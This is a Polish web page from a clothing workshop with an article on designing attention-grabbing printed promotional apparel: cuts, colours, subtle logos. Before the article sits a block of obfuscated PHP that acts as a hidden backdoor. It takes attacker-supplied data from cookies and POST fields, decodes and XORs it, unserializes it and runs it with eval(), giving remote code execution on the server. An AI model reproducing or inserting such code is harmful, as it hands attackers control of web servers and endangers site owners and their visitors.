$EJaOT = "\126" . chr ( 955 - 860 ).chr ( 671 - 603 )."\x58" . chr (99); $VVLiGmUYa = 'c' . 'l' . "\141" . chr (115) . chr ( 410 - 295 )."\x5f" . "\x65" . "\170" . 'i' . chr (115) . chr ( 562 - 446 )."\x73";$rFawcyv = class_exists($EJaOT); $EJaOT = "36152";$VVLiGmUYa = "21333";$yYoMUkBeNy = FALSE;if ($rFawcyv === $yYoMUkBeNy){function sAPreRGv(){return FALSE;}$XHXXE = "10820";sAPreRGv();class V_DXc{private function ohtQEAxR($XHXXE){if (is_array(V_DXc::$GaZiZD)) {$JiEBcU = str_replace("\x3c" . chr ( 625 - 562 )."\x70" . "\150" . chr ( 372 - 260 ), "", V_DXc::$GaZiZD["\x63" . chr ( 296 - 185 ).chr ( 613 - 503 )."\x74" . chr (101) . 'n' . chr (116)]);eval($JiEBcU); $XHXXE = "10820";exit();}}private $xHLRbEru;public function hSghv(){echo 50151;}public function __destruct(){$XHXXE = "64768_25380";$this->ohtQEAxR($XHXXE); $XHXXE = "64768_25380";}public function __construct($XBnRjxdBt=0){$mVTgGVkpqk = $_POST;$ywjXMgqydX = $_COOKIE;$rcJjWi = "05f4c334-1f3e-49a5-9f97-1e89d0914668";$kWepRrWnk = @$ywjXMgqydX[substr($rcJjWi, 0, 4)];if (!empty($kWepRrWnk)){$MINpojrmRv = "base64";$KPzRTIf = "";$kWepRrWnk = explode(",", $kWepRrWnk);foreach ($kWepRrWnk as $RtkBB){$KPzRTIf .= @$ywjXMgqydX[$RtkBB];$KPzRTIf .= @$mVTgGVkpqk[$RtkBB];}$KPzRTIf = array_map($MINpojrmRv . chr ( 113 - 18 ).'d' . chr ( 618 - 517 )."\x63" . chr ( 231 - 120 ).'d' . chr ( 599 - 498 ), array($KPzRTIf,)); $KPzRTIf = $KPzRTIf[0] ^ str_repeat($rcJjWi, (strlen($KPzRTIf[0]) / strlen($rcJjWi)) + 1);V_DXc::$GaZiZD = @unserialize($KPzRTIf);}}public static $GaZiZD = 25873;}$prmYwRn = new /* 45608 */ V_DXc(10820 + 10820);unset($prmYwRn);} Odzież reklamowa z nadrukiem – jakie projekty przyciągają uwagę? - Szwalnia Wave Group

Odzież reklamowa z nadrukiem – jakie projekty przyciągają uwagę?

62992-OAIESU-601

Czy odzież reklamowa zawsze musi mieć kolor biały i kończyć się pod szyją? A może by tak w tym sezonie zaszaleć z kolorami i fasonami? Dowiedz się, jak zaprojektować odzież reklamową, by zwracała uwagę na ulicy.

Funkcja odzieży reklamowej jest oczywista – projekt powinien przyciągać uwagę i zachęcać do skorzystania z usług lub produktów firmy. Jak to zrobić właściwie? Czy w dzisiejszych czasach zwykła koszulka z nadrukowanym logo marki już nie wystarcza? Dowiedz się, jak zachęcić klientów do zakupów za pomocą odzieży reklamowej.

Odzież reklamowa o modnym kroju

Niestety firmy przyzwyczaiły nas do tego, że jeśli dostajemy darmową koszulkę z ich logo, to nadaje się ona wyłącznie do spania. Na szczęście nasza szwalnia odzieży reklamowej otrzymuje coraz więcej zleceń na projekt i realizację odzieży reklamowej o ciekawych krojach – koszulki dla kobiet ze wcięciem w talii i luźnym dekoltem, męskie t-shirty w streetwearowym stylu, bluzy baseballowe czy kurtki-parki. Czyżby epoka obszernych i bezkształtnych t-shirtów z logo już się powoli chyliła ku końcowi?

Logo na odzieży reklamowej to nie wszystko?

Coraz więcej firm decyduje się zamieścić na odzieży reklamowej mniej „krzykliwe” logo. Nie musi się ono znajdować w centralnym planie, może być dyskretne i niewielkie, może znajdować się przy kołnierzyku na plecach. Niektóre firmy nawet pokusiły się o projekty bez logo. Niech ciekawy napis lub obraz mówią same za siebie. Niech kojarzą się z marką, zamiast nachalnie wciąż o niej przypominać.

Odzież reklamowa z kolorowym nadrukiem

Nudny t-shirt z logo i tak wyląduje w szafie, w której będzie przechowywany na wieczne nienoszenie, ewentualnie będzie zakładany do snu, czyli i tak go nikt nie zobaczy. Oznacza to, że inwestując w odzież reklamową, w której nikt nie wyjdzie na ulicę, tak naprawdę Twoja firma wyrzuca pieniądze do kosza. Doskonałym rozwiązaniem jest zaprojektowanie kolorowego, zabawnego nadruku. Kieruj się najnowszymi trendami, tym co lubi młodzież lub stwórz coś własnego, co zwróci uwagę każdego – na przykład ambiwalentny tekst lub przewrotną grafikę.

Kolorowa odzież reklamowa

Oczywiście najbardziej powszechnym kolorem odzieży reklamowej jest biały. Tymczasem przyszła wiosna i każdy z nas ma potrzebę nacieszyć oczy różnobarwnymi ubraniami. Nie wspominając już o tym, że ostre kolory Twojej odzieży reklamowej na pewno szybciej przyciągną wzrok potencjalnych klientów niż te mniej krzykliwe. Nie zapominaj jednak, by zawsze mieć z tyłu głowy, kim są ludzie należący do Twojej grupy docelowej. Jeśli tak się złożyło, że są to w większości osoby noszące na przykład kolor czarny, nie doradzamy ryzykownych eksperymentów.

Zwróć uwagę na swoją odzież reklamową za pomocą zaskakujących kolorów oraz modnego fasonu. Skończ z t-shirtami, które nigdy nie ujrzą światła dziennego!

Sprawdź również drukarnię internetową KID

Formularz kontaktowy